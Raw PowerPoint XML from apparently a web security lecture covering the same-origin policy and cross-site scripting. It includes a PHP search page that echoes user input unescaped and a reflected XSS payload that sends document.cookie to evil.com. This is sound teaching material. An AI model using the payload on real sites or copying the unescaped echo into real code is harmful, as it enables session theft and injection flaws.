              <a:t>-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>clear:both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>;"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div id="menu"&gt;   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="822960" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>&gt;    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>li&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;Home&lt;/a&gt;&lt;/li&gt;    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>li&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>syllabus.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;Syllabus&lt;/a&gt;&lt;/li&gt;    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>li&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>schedule.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;Schedule&lt;/a&gt;&lt;/li&gt;    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>li&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>project.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;Project&lt;/a&gt;&lt;/li&gt;  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="822960" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;/div&gt;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392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Object Model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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2057400"/>
            <a:ext cx="8964264" cy="3719127"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146251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Origin Policy (SOP)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Data for http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> accessed by: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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page2.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/page3.html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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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dir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page.html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http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:81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dir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page.html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http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.com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dir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page.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com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dir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page.html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174" y="2094807"/>
            <a:ext cx="394960" cy="363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672" y="2905005"/>
            <a:ext cx="394481" cy="465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965" y="2534550"/>
            <a:ext cx="395835" cy="364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298" y="3327430"/>
            <a:ext cx="394481" cy="465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444" y="4294477"/>
            <a:ext cx="394481" cy="4659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298" y="4700821"/>
            <a:ext cx="377856" cy="44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 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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Domain relaxation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-origin network requests: Access-Control-Allow-Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-origin client-side communication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Importing scripts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0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Security Incidents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9935"/>
            <a:ext cx="8229600" cy="4597329"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159515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Cross-Site Scripting (XSS)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 of code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sends victim a script that runs on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>example.com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5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Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 18" descr="toshiba_satellite_a105_s4284_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754313"/>
            <a:ext cx="1436688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CompaqAlphaServerES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9475" y="5132388"/>
            <a:ext cx="11557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S15server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4188" y="2057400"/>
            <a:ext cx="2436812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43600" y="1676400"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server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562600" y="4705350"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="2073275"/>
            <a:ext cx="3211512" cy="6873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" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2455863"/>
            <a:ext cx="3440112" cy="77311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TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2422525"/>
            <a:ext cx="2576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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="4114800"/>
            <a:ext cx="2830512" cy="990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" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4222750"/>
            <a:ext cx="1654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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4673600"/>
            <a:ext cx="263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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="210185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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a: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2209800" y="275907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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a: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 rot="1068865">
            <a:off x="2714625" y="385762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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4476750"/>
            <a:ext cx="3352800" cy="11620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19" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="3046413"/>
            <a:ext cx="3211512" cy="6873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" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2901950"/>
            <a:ext cx="2305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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="320040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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="415925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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2970213" y="1873200"/>
            <a:ext cx="1654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0458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184383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Reflected XSS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Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>field on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>search.php?term</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side implementation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>search.php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sz="19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900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>html&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900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19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900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>title&gt; Search Results &lt;/title&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900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19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900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>body&gt; Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> echo $_GET[term] ?&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>body&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>html&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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 smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if victim instead clicks on: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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim.com/search.php?term=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="2" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.com?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= 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” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
